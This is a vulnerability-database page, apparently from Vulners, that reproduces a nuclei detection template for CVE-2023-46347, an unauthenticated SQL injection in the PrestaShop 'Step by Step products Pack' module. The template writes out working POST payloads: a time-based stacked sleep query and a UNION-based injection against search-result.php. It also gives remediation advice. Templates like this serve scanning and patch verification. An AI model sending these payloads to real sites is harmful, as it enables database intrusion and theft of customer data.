Lucene search
K

PrestaShop Step by Step products Pack - SQL Injection

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 139 Views

PrestaShop Step by Step products Pack - SQL Injection, critical severity, NDK Design module, CVE-2023-4634

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-46347
25 Oct 202318:17
attackerkb
Circl
CVE-2023-46347
27 Mar 202500:00
circl
CNNVD
PrestaShop SQL Injection Vulnerability
25 Oct 202300:00
cnnvd
CVE
CVE-2023-46347
25 Oct 202300:00
cve
Cvelist
CVE-2023-46347
25 Oct 202300:00
cvelist
NVD
CVE-2023-46347
25 Oct 202318:17
nvd
OSV
CVE-2023-46347
25 Oct 202318:17
osv
Prion
Sql injection
25 Oct 202318:17
prion
Positive Technologies
PT-2023-29968 · Unknown · Ndk Steppingpack
24 Oct 202300:00
ptsecurity
RedhatCVE
CVE-2023-46347
23 May 202503:57
redhatcve
Rows per page
id: CVE-2023-46347

info:
  name: PrestaShop Step by Step products Pack - SQL Injection
  author: MaStErChO
  severity: critical
  description: |
    In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL queries, potentially extracting sensitive database information including user credentials and payment data.
  remediation: |
    Update the Step by Step products Pack (ndk_steppingpack) module to version 1.5.7 or later from NDK Design.
  reference:
    - https://security.friendsofpresta.org/modules/2023/10/24/ndk_steppingpack.html
    - https://stack.chaitin.com/poc/detail/3977
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-46347
    cwe-id: CWE-89
    epss-score: 0.49885
    epss-percentile: 0.98758
    cpe: cpe:2.3:a:ndkdesign:ndk_steppingpack:*:*:*:*:*:prestashop:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ndkdesign
    product: ndk_steppingpack
    framework: prestashop
    shodan-query: http.component:"prestashop"
  tags: time-based-sqli,cve,cve2023,sqli,prestashop,ndk_steppingpack,ndkdesign,vkev,vuln

variables:
  num: "999999999"

http:
  - raw:
      - |
        @timeout: 15s
        POST /modules/ndk_steppingpack/search-result.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        search_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;--

      - |
        @timeout: 15s
        POST /modules/ndk_steppingpack/search-result.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        search_query=1")+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}})),NULL,NULL,NULL,NULL--+-

    stop-at-first-match: true
    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        name: Time Based
        dsl:
          - 'status_code_1 != 404'
          - 'duration_1>=6'
          - 'contains(content_type_1, "text/html")'
          - 'contains_any(tolower(response_1), "prestashop", "xipblog")'
        condition: and

      - type: word
        name: union-based
        part: body_2
        words:
          - '{{md5({{num}})}}'
# digest: 4b0a00483046022100e0f903d6157c0d9ace7c32d5e7e74e80bda201ec1d035092d2fb81d99ba58bbd022100a06c505d2f9d59d05f12ab4e944d1caece386b92efb8268e5fa2cca2e970200f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
EPSS0.49885
SSVC
139